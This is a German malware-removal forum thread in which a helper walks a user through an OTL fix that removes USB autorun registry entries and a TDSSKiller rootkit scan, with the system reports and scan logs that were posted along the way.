"{D55642BE-5836-4CDB-8A16-0114F93FE5F2}" = protocol=17 | dir=in | app=c:\program files\pinnacle\shared files\programs\strmserver\strmserver.exe | 
"{E810B54B-4B65-4C78-9139-824738374694}" = protocol=17 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 
"{EA478A72-42C6-49D7-95DB-358F57A8B512}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe | 
"{EE5C1F2B-44D5-4BAE-BF32-6245683AA23D}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"TCP Query User{54279280-8F23-4BA9-9E36-CE06ABB00513}C:\program files\mozilla thunderbird\thunderbird.exe" = protocol=6 | dir=in | app=c:\program files\mozilla thunderbird\thunderbird.exe | 
"TCP Query User{773BDB20-BBD6-46FE-B421-12DF0F9EF2F2}C:\xampp\apache\bin\httpd.exe" = protocol=6 | dir=in | app=c:\xampp\apache\bin\httpd.exe | 
"TCP Query User{94CA6C52-5629-408C-BE9A-81068EA0156B}C:\program files\mozilla firefox\firefox.exe" = protocol=6 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 
"TCP Query User{BB32885D-2FF9-4630-9D00-C7DFD9FC3786}C:\windows\explorer.exe" = protocol=6 | dir=in | app=c:\windows\explorer.exe | 
"TCP Query User{BEC3CAC1-2AF8-4A1D-977E-2E1A997B2D01}C:\program files\mozilla firefox\firefox.exe" = protocol=6 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 
"UDP Query User{39A00ACD-5B35-4DDC-AECB-265D1DC4A269}C:\program files\mozilla firefox\firefox.exe" = protocol=17 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 
"UDP Query User{5D8CA6A2-4222-48D2-AB6F-0C8AC40F1D85}C:\xampp\apache\bin\httpd.exe" = protocol=17 | dir=in | app=c:\xampp\apache\bin\httpd.exe | 
"UDP Query User{6DFB4226-425E-4206-A91E-9B0D975905E8}C:\windows\explorer.exe" = protocol=17 | dir=in | app=c:\windows\explorer.exe | 
"UDP Query User{84CBEA78-88A6-4423-8DF3-06BA1AACE776}C:\program files\mozilla firefox\firefox.exe" = protocol=17 | dir=in | app=c:\program files\mozilla firefox\firefox.exe | 
"UDP Query User{FE1B0B2D-DABC-4B72-9E1A-91993448416F}C:\program files\mozilla thunderbird\thunderbird.exe" = protocol=17 | dir=in | app=c:\program files\mozilla thunderbird\thunderbird.exe | 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{00010407-78E1-11D2-B60F-006097C998E7}" = Microsoft Office 2000 Professional
"{02E89EFC-7B07-4D5A-AA03-9EC0902914EE}" = VC 9.0 Runtime
"{052FDD78-A6EA-3187-8386-C82F4CA3A929}" = Microsoft .NET Framework 3.5 Language Pack SP1 - deu
"{1061DF04-CF33-40B0-8360-D07C9BBEB122}" = HP Wireless Assistant
"{18D10072035C4515918F7E37EAFAACFC}" = AutoUpdate
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{26A24AE4-039D-4CA4-87B4-2F83216035FF}" = Java(TM) 6 Update 35
"{26A24AE4-039D-4CA4-87B4-2F83217010FF}" = Java 7 Update 10
"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
"{4286716B-1287-48E7-9078-3DC8248DBA96}" = OpenOffice.org 3.3
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{6AD9F5F3-5BD0-4000-BD9C-B536CF86D988}" = iTunes
"{6AFCA4E1-9B78-3640-8F72-A7BF33448200}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{716E0306-8318-4364-8B8F-0CC4E9376BAC}" = MSXML 4.0 SP2 Parser and SDK
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{7426D8C8-7323-4A3D-9F94-2465B95C26B5}" = TVCenter
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79155F2B-9895-49D7-8612-D92580E0DE5B}" = Bonjour
"{7B63B2922B174135AFC0E1377DD81EC2}" = DivX Codec
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{8F1ADE4D-EFAC-4F5A-B346-23C2687FAF50}" = Apple Mobile Device Support
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{AC76BA86-7AD7-1031-7B44-AA1000000001}" = Adobe Reader X (10.1.4) - Deutsch
"{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}" = QuickTime
"{B6CF2967-C81E-40C0-9815-C05774FEF120}" = Skype Toolbars
"{C8FD5BC1-92EF-4C15-92A9-F9AC7F61985F}" = HP Update
"{CAE7D1D9-3794-4169-B4DD-964ADBC534EE}" = HP Product Detection
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{D6F879CC-59D6-4D4B-AE9B-D761E48D25ED}" = Skype™ 5.3
"{D85FFE92-BF14-4E9B-BCCD-E5C16069E65F}_is1" = FireJump 1.0
"{DFAA3D2B-7087-464E-823B-738A23C29C27}" = Microsoft Visual J# 2.0 Redistributable Package - SE
"{F0A37341-D692-11D4-A984-009027EC0A9C}" = SoundMAX
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F38ADCA4-AF7C-4C73-9021-6F1EA15D15EA}" = Pinnacle TVCenter Pro
"{F5266D28-E0B2-4130-BFC5-EE155AD514DC}" = Apple Application Support
"{F750C986-5310-3A5A-95F8-4EC71C8AC01C}" = Microsoft .NET Framework 4 Client Profile DEU Language Pack
"7-Zip" = 7-Zip 9.20
"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 11.6
"Agere Systems Soft Modem" = Agere Systems HDA Modem
"Avira AntiVir Desktop" = Avira Free Antivirus
"BabylonToolbar" = Babylon toolbar 
"Broadcom 802.11 Wireless LAN Adapter" = Broadcom 802.11 Wireless LAN Adapter
"BurnAware Free_is1" = BurnAware Free 5.2
"Der_Deploy_0" = Der Kleine Turnierplaner 7.1.4.1
"FileZilla Client" = FileZilla Client 3.6.0.2
"HDMI" = Intel(R) Graphics Media Accelerator Driver
"Hotspot_Shield Toolbar" = Hotspot Shield Toolbar
"HotspotShield" = Hotspot Shield 2.75
"InfraRecorder" = InfraRecorder
"LM98Free 2.2a_is1" = LM98Free 2.2a
"LuPO_is1" = LuPO 1.0.2.45
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware Version 1.70.0.1100
"Marvell Miniport Driver" = Marvell Miniport Driver
"Microsoft .NET Framework 3.5 Language Pack SP1 - deu" = Microsoft .NET Framework 3.5 Language Pack SP1 - DEU
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"Microsoft .NET Framework 4 Client Profile DEU Language Pack" = Microsoft .NET Framework 4 Client Profile DEU Language Pack
"Microsoft Visual J# 2.0 Redistributable Package - SE" = Microsoft Visual J# 2.0 Redistributable Package - SE
"Mozilla Firefox 18.0.2 (x86 de)" = Mozilla Firefox 18.0.2 (x86 de)
"Mozilla Thunderbird 17.0.2 (x86 de)" = Mozilla Thunderbird 17.0.2 (x86 de)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Mp3tag" = Mp3tag v2.49
"Notepad++" = Notepad++
"RocketDock_is1" = RocketDock 1.3.5
"Scribus 1.3.9" = Scribus 1.3.9
"SearchAnonymizer" = SearchAnonymizer
"SPG-Verein" = SPG-Verein
"SynTPDeinstKey" = Synaptics Pointing Device Driver
"TeamViewer 8" = TeamViewer 8
"Verbindungsassistent" = Verbindungsassistent
"VEREIN 2000" = 
"VLC media player" = VLC media player 1.1.10
"WinGimp-2.0_is1" = GIMP 2.6.11
"WinHTTrack Website Copier_is1" = WinHTTrack Website Copier 3.46-1
"XP Codec Pack" = XP Codec Pack
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"CopyTrans Suite" = Nur Deinstallierung der CopyTrans Suite möglich.
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 05.01.2013 06:28:25 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 2605
 
Error - 05.01.2013 06:28:25 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 2605
 
Error - 21.01.2013 06:02:55 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 21.01.2013 06:02:55 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 1326
 
Error - 21.01.2013 06:02:55 | Computer Name = TuS-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 1326
 
Error - 29.01.2013 12:59:53 | Computer Name = TuS-PC | Source = Application Error | ID = 1000
Description = Fehlerhafte Anwendung iTunes.exe, Version 10.6.3.25, Zeitstempel 0x4fd16377,
 fehlerhaftes Modul ntdll.dll, Version 6.0.6002.18541, Zeitstempel 0x4ec3e3d5, Ausnahmecode
 0x80000003, Fehleroffset 0x0004878e,  Prozess-ID 0x15e0, Anwendungsstartzeit 01cdfe3c3bd13c94.
 
Error - 29.01.2013 13:00:01 | Computer Name = TuS-PC | Source = Application Error | ID = 1000
Description = Fehlerhafte Anwendung iTunes.exe, Version 10.6.3.25, Zeitstempel 0x4fd16377,
 fehlerhaftes Modul iTunes.dll, Version 10.6.3.25, Zeitstempel 0x4fd1634f, Ausnahmecode
 0xc0000005, Fehleroffset 0x007b1a62,  Prozess-ID 0x15e0, Anwendungsstartzeit 01cdfe3c3bd13c94.
 
Error - 29.01.2013 13:29:50 | Computer Name = TuS-PC | Source = Application Error | ID = 1000
Description = Fehlerhafte Anwendung iTunes.exe, Version 10.6.3.25, Zeitstempel 0x4fd16377,
 fehlerhaftes Modul JavaScriptCore.dll, Version 7536.27.1.1, Zeitstempel 0x506116fd,
 Ausnahmecode 0xc0000005, Fehleroffset 0x00116b2a,  Prozess-ID 0xf30, Anwendungsstartzeit
 01cdfe4215b9d7d0.
 
Error - 29.01.2013 13:30:42 | Computer Name = TuS-PC | Source = Application Hang | ID = 1002
Description = Programm iTunes.exe, Version 10.6.3.25 arbeitet nicht mehr mit Windows
 zusammen und wurde beendet. Überprüfen Sie den Problemverlauf im Applet "Lösungen
 für Probleme" in der Systemsteuerung, um nach weiteren Informationen über das Problem
 zu suchen.  Prozess-ID: f30  Anfangszeit: 01cdfe4215b9d7d0  Zeitpunkt der Beendigung:
 44
 
Error - 31.01.2013 19:03:24 | Computer Name = TuS-PC | Source = Windows Search Service | ID = 3013
Description = 
 
[ System Events ]
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:38:53 | Computer Name = TuS-PC | Source = atapi | ID = 262155
Description = Der Treiber hat einen Controllerfehler auf \Device\Ide\IdePort0 gefunden.
 
Error - 13.02.2013 10:39:29 | Computer Name = TuS-PC | Source = volsnap | ID = 393230
Description = Die Schattenkopien von Volume "C:" wurden aufgrund eines E/A-Fehlers
 auf Volume "C:" abgebrochen.
 
Error - 13.02.2013 14:50:20 | Computer Name = TuS-PC | Source = DCOM | ID = 10010
Description = 
 
Error - 16.02.2013 16:22:22 | Computer Name = TuS-PC | Source = EventLog | ID = 6008
Description = Das System wurde zuvor am 16.02.2013 um 20:48:46 unerwartet heruntergefahren.
 
 
< End of report >

--- --- ---

markusg · 19.02.2013, 00:07

hi,
otl fix

Fixen mit OTL

Starte bitte die OTL.exe.
Kopiere nun den Inhalt aus der Codebox in die Textbox.

Code:

ATTFilter

:OTL
O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe
O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe
O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a
O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell - "" = AutoRun
O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a
:files
:Commands
[emptytemp]

Solltest du deinen Benutzernamen z. B. durch "*****" unkenntlich gemacht haben, so füge an entsprechender Stelle deinen richtigen Benutzernamen ein. Andernfalls wird der Fix nicht funktionieren.
Schließe bitte nun alle Programme.
Klicke nun bitte auf den Fix Button.
OTL kann gegebenfalls einen Neustart verlangen. Bitte dies zulassen.
Nach dem Neustart findest Du ein Textdokument auf deinem Desktop.
( Auch zu finden unter C:\_OTL\MovedFiles\<Uhrzeit_Datum>.txt)
Kopiere nun den Inhalt hier in Deinen Thread

martinbu · 19.02.2013, 00:54

Erledigt, Inhalt der Datei siehe unten. Allerdings ist Avira nun deaktiviert!?

Zitat:

All processes killed
========== OTL ==========
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\ not found.
File G:\AutoRun.exe not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\ not found.
File G:\AutoRun.exe not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\ not found.
File H:\LaunchU3.exe -a not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\ not found.
File H:\LaunchU3.exe -a not found.
========== FILES ==========
========== COMMANDS ==========

[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Public

User: TuS
->Temp folder emptied: 31832 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 3695164 bytes
->Flash cache emptied: 492 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 0 bytes
RecycleBin emptied: 4980084 bytes

Total Files Cleaned = 8,00 mb

OTL by OldTimer - Version 3.2.69.0 log created on 02192013_004642

Files\Folders moved on Reboot...

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

Zitat:

Zitat von martinbu

Erledigt, Inhalt der Datei siehe unten. Allerdings ist Avira nun deaktiviert!?

Bezüglich Avira hat sich die Sache erledigt, läuft nach einem erneuten Start nun wieder ganz normal.

markusg · 19.02.2013, 12:51

Hi,
Downloade dir bitte

TDSSKiller.exe und speichere diese Datei auf dem Desktop

Starte die TDSSKiller.exe - Einstellen wie in der Anleitung zu TDSSKiller beschrieben.
Drücke Start Scan
Sollten infizierte Objekte gefunden werden, wähle keinesfalls Cure. Wähle Skip und klicke auf Continue.
TDSSKiller wird eine Logfile auf deinem Systemlaufwerk speichern (Meistens C:\)
Als Beispiel: C:\TDSSKiller.<Version_Datum_Uhrzeit>log.txt

Poste den Inhalt bitte in jedem Fall hier in deinen Thread.

martinbu · 19.02.2013, 14:28

Keine infizierten Dateien gefunden, die Logfile anbei.

Zitat:

14:26:10.0303 4252 TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42
14:26:10.0534 4252 ============================================================
14:26:10.0534 4252 Current date / time: 2013/02/19 14:26:10.0534
14:26:10.0534 4252 SystemInfo:
14:26:10.0534 4252
14:26:10.0534 4252 OS Version: 6.0.6002 ServicePack: 2.0
14:26:10.0534 4252 Product type: Workstation
14:26:10.0534 4252 ComputerName: TUS-PC
14:26:10.0535 4252 UserName: TuS
14:26:10.0535 4252 Windows directory: C:\Windows
14:26:10.0535 4252 System windows directory: C:\Windows
14:26:10.0535 4252 Processor architecture: Intel x86
14:26:10.0535 4252 Number of processors: 2
14:26:10.0535 4252 Page size: 0x1000
14:26:10.0535 4252 Boot type: Normal boot
14:26:10.0535 4252 ============================================================
14:26:12.0634 4252 Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
14:26:12.0634 4252 Drive \Device\Harddisk1\DR1 - Size: 0x7470C06000 (465.76 Gb), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:26:12.0634 4252 Drive \Device\Harddisk2\DR2 - Size: 0x1D1C0F00000 (1863.01 Gb), SectorSize: 0x200, Cylinders: 0x3B601, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:26:12.0634 4252 ============================================================
14:26:12.0634 4252 \Device\Harddisk0\DR0:
14:26:12.0634 4252 MBR partitions:
14:26:12.0634 4252 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x1BDC3FC1
14:26:12.0634 4252 \Device\Harddisk0\DR0\Partition2: MBR, Type 0xC, StartLBA 0x1BDC4000, BlocksNum 0x200800
14:26:12.0634 4252 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x1BFC4970, BlocksNum 0x1201000
14:26:12.0634 4252 \Device\Harddisk1\DR1:
14:26:12.0634 4252 MBR partitions:
14:26:12.0634 4252 \Device\Harddisk1\DR1\Partition1: MBR, Type 0xC, StartLBA 0x3F, BlocksNum 0x3A384C02
14:26:12.0634 4252 \Device\Harddisk2\DR2:
14:26:12.0634 4252 MBR partitions:
14:26:12.0634 4252 \Device\Harddisk2\DR2\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0xE8E07000
14:26:12.0634 4252 ============================================================
14:26:12.0665 4252 C: <-> \Device\Harddisk0\DR0\Partition1
14:26:12.0696 4252 D: <-> \Device\Harddisk0\DR0\Partition2
14:26:12.0821 4252 E: <-> \Device\Harddisk0\DR0\Partition3
14:26:12.0837 4252 G: <-> \Device\Harddisk2\DR2\Partition1
14:26:12.0837 4252 H: <-> \Device\Harddisk1\DR1\Partition1
14:26:12.0837 4252 ============================================================
14:26:12.0837 4252 Initialize success
14:26:12.0837 4252 ============================================================
14:26:33.0587 1440 ============================================================
14:26:33.0587 1440 Scan started
14:26:33.0587 1440 Mode: Manual;
14:26:33.0587 1440 ============================================================
14:26:34.0387 1440 ================ Scan system memory ========================
14:26:34.0387 1440 System memory - ok
14:26:34.0387 1440 ================ Scan services =============================
14:26:34.0617 1440 [ AEF9EE4451D5C46370142CB06D0F3591 ] Accelerometer C:\Windows\system32\DRIVERS\Accelerometer.sys
14:26:34.0647 1440 Accelerometer - ok
14:26:34.0667 1440 [ 82B296AE1892FE3DBEE00C9CF92F8AC7 ] ACPI C:\Windows\system32\drivers\acpi.sys
14:26:34.0677 1440 ACPI - ok
14:26:34.0707 1440 [ BF9DE454F80A1516D4D582520B2D6EDD ] ADIHdAudAddService C:\Windows\system32\drivers\ADIHdAud.sys
14:26:34.0717 1440 ADIHdAudAddService - ok
14:26:34.0817 1440 [ D19C4EE2AC7C47B8F5F84FFF1A789D8A ] AdobeARMservice C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
14:26:34.0817 1440 AdobeARMservice - ok
14:26:34.0887 1440 [ EC807244904FA170C299AB06D87FBDBE ] AdobeFlashPlayerUpdateSvc C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
14:26:34.0897 1440 AdobeFlashPlayerUpdateSvc - ok
14:26:34.0937 1440 [ 2EDC5BBAC6C651ECE337BDE8ED97C9FB ] adp94xx C:\Windows\system32\drivers\adp94xx.sys
14:26:34.0953 1440 adp94xx - ok
14:26:34.0988 1440 [ B84088CA3CDCA97DA44A984C6CE1CCAD ] adpahci C:\Windows\system32\drivers\adpahci.sys
14:26:35.0019 1440 adpahci - ok
14:26:35.0046 1440 [ 7880C67BCCC27C86FD05AA2AFB5EA469 ] adpu160m C:\Windows\system32\drivers\adpu160m.sys
14:26:35.0075 1440 adpu160m - ok
14:26:35.0104 1440 [ 9AE713F8E30EFC2ABCCD84904333DF4D ] adpu320 C:\Windows\system32\drivers\adpu320.sys
14:26:35.0128 1440 adpu320 - ok
14:26:35.0173 1440 [ 30EB9BCF0D1E4EDD3905AE003AC0C1AC ] AEADIFilters C:\Windows\system32\AEADISRV.EXE
14:26:35.0174 1440 AEADIFilters - ok
14:26:35.0193 1440 [ 9D1FDA9E086BA64E3C93C9DE32461BCF ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
14:26:35.0194 1440 AeLookupSvc - ok
14:26:35.0248 1440 [ 3911B972B55FEA0478476B2E777B29FA ] AFD C:\Windows\system32\drivers\afd.sys
14:26:35.0264 1440 AFD - ok
14:26:35.0299 1440 [ 9C9D3B7A05445B1AB2DF4D0C4D6B77E8 ] AgereModemAudio C:\Program Files\LSI SoftModem\agrsmsvc.exe
14:26:35.0300 1440 AgereModemAudio - ok
14:26:35.0347 1440 [ 3712986CC3ABF0DC656B43525B9D1279 ] AgereSoftModem C:\Windows\system32\DRIVERS\AGRSM.sys
14:26:35.0415 1440 AgereSoftModem - ok
14:26:35.0453 1440 [ EF23439CDD587F64C2C1B8825CEAD7D8 ] agp440 C:\Windows\system32\drivers\agp440.sys
14:26:35.0480 1440 agp440 - ok
14:26:35.0506 1440 [ AE1FDF7BF7BB6C6A70F67699D880592A ] aic78xx C:\Windows\system32\drivers\djsvs.sys
14:26:35.0532 1440 aic78xx - ok
14:26:35.0553 1440 [ A1545B731579895D8CC44FC0481C1192 ] ALG C:\Windows\System32\alg.exe
14:26:35.0576 1440 ALG - ok
14:26:35.0605 1440 [ 90395B64600EBB4552E26E178C94B2E4 ] aliide C:\Windows\system32\drivers\aliide.sys
14:26:35.0631 1440 aliide - ok
14:26:35.0653 1440 [ 2B13E304C9DFDFA5EB582F6A149FA2C7 ] amdagp C:\Windows\system32\drivers\amdagp.sys
14:26:35.0685 1440 amdagp - ok
14:26:35.0703 1440 [ 0577DF1D323FE75A739C787893D300EA ] amdide C:\Windows\system32\drivers\amdide.sys
14:26:35.0721 1440 amdide - ok
14:26:35.0755 1440 [ DC487885BCEF9F28EECE6FAC0E5DDFC5 ] AmdK7 C:\Windows\system32\drivers\amdk7.sys
14:26:35.0779 1440 AmdK7 - ok
14:26:35.0799 1440 [ 0CA0071DA4315B00FC1328CA86B425DA ] AmdK8 C:\Windows\system32\drivers\amdk8.sys
14:26:35.0822 1440 AmdK8 - ok
14:26:35.0877 1440 [ 466A0D95960DAD3222C896D2CEA99993 ] AntiVirSchedulerService C:\Program Files\Avira\AntiVir Desktop\sched.exe
14:26:35.0878 1440 AntiVirSchedulerService - ok
14:26:35.0912 1440 [ A489BE6BB0AA1FF406B488B60542314B ] AntiVirService C:\Program Files\Avira\AntiVir Desktop\avguard.exe
14:26:35.0913 1440 AntiVirService - ok
14:26:35.0952 1440 [ C6D704C7F0434DC791AAC37CAC4B6E14 ] Appinfo C:\Windows\System32\appinfo.dll
14:26:35.0954 1440 Appinfo - ok
14:26:36.0034 1440 [ F401929EE0CC92BFE7F15161CA535383 ] Apple Mobile Device C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
14:26:36.0036 1440 Apple Mobile Device - ok
14:26:36.0068 1440 [ 5F673180268BB1FDB69C99B6619FE379 ] arc C:\Windows\system32\drivers\arc.sys
14:26:36.0092 1440 arc - ok
14:26:36.0144 1440 [ 957F7540B5E7F602E44648C7DE5A1C05 ] arcsas C:\Windows\system32\drivers\arcsas.sys
14:26:36.0170 1440 arcsas - ok
14:26:36.0208 1440 [ 53B202ABEE6455406254444303E87BE1 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
14:26:36.0248 1440 AsyncMac - ok
14:26:36.0278 1440 [ 1F05B78AB91C9075565A9D8A4B880BC4 ] atapi C:\Windows\system32\drivers\atapi.sys
14:26:36.0279 1440 atapi - ok
14:26:36.0313 1440 [ 68E2A1A0407A66CF50DA0300852424AB ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
14:26:36.0318 1440 AudioEndpointBuilder - ok
14:26:36.0329 1440 [ 68E2A1A0407A66CF50DA0300852424AB ] Audiosrv C:\Windows\System32\Audiosrv.dll
14:26:36.0332 1440 Audiosrv - ok
14:26:36.0353 1440 [ D5541F0AFB767E85FC412FC609D96A74 ] avgntflt C:\Windows\system32\DRIVERS\avgntflt.sys
14:26:36.0385 1440 avgntflt - ok
14:26:36.0422 1440 [ 7D967A682D4694DF7FA57D63A2DB01FE ] avipbb C:\Windows\system32\DRIVERS\avipbb.sys
14:26:36.0451 1440 avipbb - ok
14:26:36.0479 1440 [ 271CFD1A989209B1964E24D969552BF7 ] avkmgr C:\Windows\system32\DRIVERS\avkmgr.sys
14:26:36.0502 1440 avkmgr - ok
14:26:36.0542 1440 [ 0A5E8178EFF1D8F109A95235AEB7D76F ] azvusb C:\Windows\system32\DRIVERS\azvusb.sys
14:26:36.0566 1440 azvusb - ok
14:26:36.0605 1440 [ 67E506B75BD5326A3EC7B70BD014DFB6 ] Beep C:\Windows\system32\drivers\Beep.sys
14:26:36.0623 1440 Beep - ok
14:26:36.0674 1440 [ C789AF0F724FDA5852FB9A7D3A432381 ] BFE C:\Windows\System32\bfe.dll
14:26:36.0682 1440 BFE - ok
